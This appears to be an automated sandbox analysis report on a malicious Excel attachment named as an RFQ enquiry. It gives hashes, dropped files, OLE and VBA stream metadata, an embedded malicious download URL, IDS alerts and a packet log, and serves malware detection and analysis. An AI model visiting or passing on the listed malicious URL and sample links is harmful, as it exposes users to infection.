                            spc.elfGet hashmaliciousMirai, MoobotBrowse
                            • 20.91.231.76
                            mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                            • 20.4.121.213
                            x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                            • 157.55.40.153
                            1 (1035).exeGet hashmaliciousPoisonivyBrowse
                            • 204.79.197.203
                            https://tl.phoneky.com/android/?id=d1d149166Get hashmaliciousUnknownBrowse
                            • 20.157.93.108
                            https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuLGet hashmaliciousUnknownBrowse
                            • 52.109.16.92
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.40
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            6271f898ce5be7dd52b0fc260d0662b3Player666.exeGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            Player666.exeGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            https://github.com/abunaj3/abjjd/releases/download/2/2.mp3Get hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PO10026369-1.xlsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PO No 6500023972.xlsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PO10026369-1.xlsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PO No 6500023972.xlsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            http://clean-out.proGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            https://www.flugger.pl/Get hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            Nueva orden.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            a0e9f5d64349fb13191bc781f81f42e1random(12).exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            random(11).exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            ZqkKpwG.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            random(3).exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            random(1).exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            random(9).exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, Socks5SystemzBrowse
                            • 13.107.246.40
                            ZqkKpwG.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.40
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.40
                            No context
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):118
                            Entropy (8bit):3.5700810731231707
                            Encrypted:false
                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                            MD5:573220372DA4ED487441611079B623CD
                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):820
                            Entropy (8bit):2.7159862044217853
                            Encrypted:false
                            SSDEEP:24:YIrNyk+vpKAzH5wcfHGFAAJp9WtAZRJ5poIHWI:Ymt+RfzHuc8AAJtfJ52IHV
                            MD5:4C216BA54D1A1E057DBD017884BCAE68
                            SHA1:04F6A2A122C952A6EE4E54FDB8185D4052074B21
                            SHA-256:80AB97552897B6DD6B37DC244018756D8FE893435AA360A26BFF8E6560D81E9C
                            SHA-512:1F5F905260B372F9AEE7B6E574F0F427A85F74F30AB90B2CBF7847462A437C8907BDCA33D54260F685AEC64CC53E3241E37A8D6999AB01138C08DB2B39FF7371
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):634880
                            Entropy (8bit):7.886858057536777
                            Encrypted:false
                            SSDEEP:12288:HX33Nhjs7sv94GMBG1HcdhUyvcgQ5dM+9lYay1HLycEvQG/2ipLsbdBR2T:n3NhB4GMBXZ1OdM+9cxEveOoBf2
                            MD5:91B3395CC3DB0945E3187D012BEB5369
                            SHA1:1666E3C39D49CFE38BE6C0C0C2EF35623EC9373B
                            SHA-256:8297FA9B0E2E1881D942DCDA85EE2CB7D6A9DC1DEB05B6BD876263121D73170A
                            SHA-512:4989F4F98E9DA3BBCBFD7E6A6A02F68EFAC131583F13E92186C4097EC7524BED36C3FBE3898578B17C080AF5348B3176FAD0D50AA6640A9CD4C42573C12FD083
                            Malicious:false
                            Reputation:low
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):633344
                            Entropy (8bit):7.923599169232986
                            Encrypted:false
                            SSDEEP:12288:MX33Nhjs7sv94GMBG1HcdhUyvcgQ5dM+9lYay1HLycEvQG/2ipLsbdBR2T:K3NhB4GMBXZ1OdM+9cxEveOoBf2
                            MD5:40EEF5A58533874DB28316B7D9A7BF3B
                            SHA1:EC548BF829FDB4968453E52D80184C3991F13ECE
                            SHA-256:C4F68E9817BE6C4FFA493BFBF3AB07AE78630D415BBE790A2E09E6F66310B2FA
                            SHA-512:0F290FEAF13C1540CE1F8D817D4B0E3075F055121A7145D016EBFB03A8FBCBA1E2D45205F8BE48A156E3B4D9C96D8BA4257B1C7B548D66CCB01B784FD9BD575C
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 24 08:33:41 2025, Security: 1
                            Category:dropped
                            Size (bytes):1416192
                            Entropy (8bit):7.9836198533327485
                            Encrypted:false
                            SSDEEP:24576:63NhB4GMBXZ1OdM+9cxEveOoBf2AbMzbXj2gI5GEYP2z8YbVPVp1uCy:Kxypr+9cce/Bf2BzLu8Ybr
                            MD5:96EC5B48F5D7E610A1C3571CC8770936
                            SHA1:25C0F75729C5E7F90B22C870D7FBB52C7A86B49E
                            SHA-256:4EEF0DAA76DE7C1E377F3C87989AEB32D6926B2A64D73A19C1D44DE2F4E06C36
                            SHA-512:69FD0E219F573E7B199B93558C42AE512A342723647F7882A5E8F5B5F0B7022420A844A1BB24A1EF7D910B5346A91A54EE936F49A590F8088AFF7E579464A8BD
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 24 08:33:41 2025, Security: 1
                            Category:dropped
                            Size (bytes):1416192
                            Entropy (8bit):7.9836198533327485
                            Encrypted:false
                            SSDEEP:24576:63NhB4GMBXZ1OdM+9cxEveOoBf2AbMzbXj2gI5GEYP2z8YbVPVp1uCy:Kxypr+9cce/Bf2BzLu8Ybr
                            MD5:96EC5B48F5D7E610A1C3571CC8770936
                            SHA1:25C0F75729C5E7F90B22C870D7FBB52C7A86B49E
                            SHA-256:4EEF0DAA76DE7C1E377F3C87989AEB32D6926B2A64D73A19C1D44DE2F4E06C36
                            SHA-512:69FD0E219F573E7B199B93558C42AE512A342723647F7882A5E8F5B5F0B7022420A844A1BB24A1EF7D910B5346A91A54EE936F49A590F8088AFF7E579464A8BD
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):165
                            Entropy (8bit):1.3520167401771568
                            Encrypted:false
                            SSDEEP:3:qs/FFyGff:qsyWf
                            MD5:5C22367453CA7CD5BD7CA96C4FD55742
                            SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                            SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                            SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                            Malicious:true
                            Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 24 01:30:09 2025, Security: 1
                            Entropy (8bit):7.9787592112424885
                            TrID:
                            • Microsoft Excel sheet (30009/1) 47.99%
                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                            File name:ENQUIRY - RFQ 674441-76450.xla.xlsx
                            File size:1'304'064 bytes
                            MD5:728def92ce2cf1e59208b5747c4f29e8
                            SHA1:b4a65a2275e8b1dbb37bb1ad7949f6f456da1773
                            SHA256:e822eabb8cd2fdd493bda865b2deebc1d4e272da9f1b17b8729de2289a31da3e
                            SHA512:9c4201cf59f67abaadcf6cc937eb8348220b0a67339cb39fa349550897db8532eb795a8c249e1a3ce81d5454558c9cd0fe64876c86a0296aebff929af9fcaedb
                            SSDEEP:24576:JKWmHNSyAZ0F17OhsB4GMBXZ1SMP8NzzHLzevHOGMUxyPEu:JM7oWypulzHLzevuGmPEu
                            TLSH:1555230BBAC2DB42E8A755B4DD939D6522083F016B0AC55733847B6A773D230D7A3B1E
                            Icon Hash:35e58a8c0c8a85b9
                            Document Type:OLE
                            Number of OLE Files:1
                            Has Summary Info:
                            Application Name:Microsoft Excel
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Code Page:1252
                            Author:
                            Last Saved By:
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2025-03-24 01:30:09
                            Creating Application:Microsoft Excel
                            Security:1
                            Document Code Page:1252
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:786432
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                            VBA File Name:Sheet1.cls
                            Stream Size:977
                            Attribute VB_Name = "Sheet1"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                            VBA File Name:Sheet2.cls
                            Stream Size:977
                            Attribute VB_Name = "Sheet2"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                            VBA File Name:Sheet3.cls
                            Stream Size:977
                            Attribute VB_Name = "Sheet3"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                            VBA File Name:ThisWorkbook.cls
                            Stream Size:985
                            Attribute VB_Name = "ThisWorkbook"
                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.889430592781307
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:200
                            Entropy:3.3020681057018666
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . G \\ . . . . . . . . .
                            General
                            Stream Path:MBD00356DE0/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:99
                            Entropy:3.631242196770981
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                            General
                            Stream Path:MBD00356DE0/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:668928
                            Entropy:7.977799713326433
                            Base64 Encoded:True
                            General
                            Stream Path:MBD00356DE1/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:788
                            Entropy:4.903728938701706
                            Base64 Encoded:False
                            Data ASCII:. . . . . a . . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . t . . . e . m . o . b . i . l . i . t . y . . . e . n . e . r . g . y . / . 3 . y . R . D . Y . q . ? . & . b . a . l . a . n . c . e . = . t . e . s . t . e . d . & . c . l . e . a . n . e . r . . . & . F . . J T E l i E . . . O p . . . . > . 9 . . [ . . i . h . < ) c . = . A . F $ . k . l . . # 2 K ! . / k @ . . . . . . . . . . . . . . . . . . . V . 7 . v . G . E . 9 . 6 . H . j . T . L . 9 . g . D . b . I . c
                            General
                            Stream Path:Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:610734
                            Entropy:7.999428911070794
                            Base64 Encoded:True
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:531
                            Entropy:5.226461353032341
                            Base64 Encoded:True
                            Data ASCII:I D = " { B 6 A C 0 8 C 9 - 0 9 D E - 4 E 0 8 - A 4 5 A - F 0 7 7 3 E 1 E 5 3 5 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 E 9 C 7 3 F 5 9 3 0 D 0 B 1 1 0
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:104
                            Entropy:3.0488640812019017
                            Base64 Encoded:False
                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:2644
                            Entropy:4.000746481629967
                            Base64 Encoded:False
                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:553
                            Entropy:6.371982954211479
                            Base64 Encoded:True
                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 7 C i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2

                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                            2025-03-24T09:33:31.711934+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49701 | 13.107.246.40 | 443 | TCP
                            2025-03-24T09:33:37.900489+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49703 | 13.107.246.40 | 443 | TCP
                            2025-03-24T09:33:37.900636+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49702 | 13.107.246.40 | 443 | TCP
                            • Total Packets: 247
                            • 443 (HTTPS)
                            • 80 (HTTP)
                            • 53 (DNS)
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 24, 2025 09:33:32.637716055 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.637823105 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.637823105 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.637837887 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.637989044 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.665199995 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.665222883 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.665345907 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.665345907 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.665359974 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.665503979 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.688524008 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.688551903 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.688636065 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.688652039 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.688733101 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.688903093 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.718034983 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.718054056 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.718311071 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.718326092 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.718599081 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.751903057 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.751923084 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.752123117 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.752135038 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.752222061 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.772834063 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.772852898 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.773334980 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.773345947 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.773787975 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.799391031 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.799416065 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.799541950 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.799554110 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.800754070 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.834197044 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.834219933 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.834311962 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.834330082 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.836692095 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.860469103 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.860498905 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.860641003 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.860641956 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.860675097 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.860892057 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.881019115 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.881050110 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.881175041 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.881175041 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.881186008 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.881273985 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.907768965 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.907795906 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.907881021 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.907881021 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.907902002 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.908288956 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.940120935 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.940144062 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.940242052 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.940242052 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.940263033 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.940476894 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.967552900 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.967576981 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.967775106 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.967787981 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.968082905 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.986897945 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.986920118 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.987055063 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.987055063 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:32.987063885 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:32.987185955 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.010051012 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.010076046 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.010163069 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.010163069 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.010171890 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.010611057 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.037055016 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.037077904 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.037153959 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.037153959 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.037163973 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.037364006 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.062561989 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.062583923 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.062668085 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.062678099 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.062697887 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.062887907 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.085545063 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.085575104 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.085660934 CET49701443192.168.2.913.107.246.40
